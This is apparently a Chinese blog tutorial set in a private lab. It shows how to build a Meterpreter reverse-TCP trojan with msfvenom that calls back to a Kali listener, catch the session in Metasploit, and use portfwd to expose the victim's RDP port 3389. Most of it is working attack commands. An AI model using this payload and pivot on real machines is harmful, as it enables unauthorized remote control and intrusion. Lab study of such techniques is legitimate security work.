天天看點

portfwd 端口轉發

作者:ailx10
portfwd 端口轉發

前面我們已經學習了ssh端口轉發、防火牆端口轉發、rinetd端口轉發、nc端口轉發、socat端口轉發、portmap端口轉發,今天我們來學習portfwd端口轉發,portfwd 是meterpreter 中的一個功能,那麼本次實驗就先來制造一個小馬,然後基于meterpreter的portfwd,實作遠端端口轉發,通路跳闆機kali的1111端口,就能通路内網win7的3389端口,這也叫3389端口反彈~

portfwd 端口轉發

ailx10

網絡安全優秀回答者

網絡安全碩士

去咨詢

實驗環境:

  • macos:192.168.199.206
  • kali:192.168.199.247
  • win7:192.168.199.185

1、生成一個小馬

msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.199.247 -f exe > hack.exe           
portfwd 端口轉發

2、通過metasploit監聽5555端口

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555           
portfwd 端口轉發

3、找個windows虛拟機,運作小馬

exploit -j -z
sessions           
portfwd 端口轉發

4、進入sessions,然後使用portfwd進行端口轉發

portfwd add -l 1111  -r 127.0.0.1 -p 3389           
portfwd 端口轉發

5、通路kali的1111端口,就是通路win7的3389端口

portfwd 端口轉發

網絡安全任重道遠,洗洗睡吧~

portfwd 端口轉發

釋出于 2022-07-23 23:27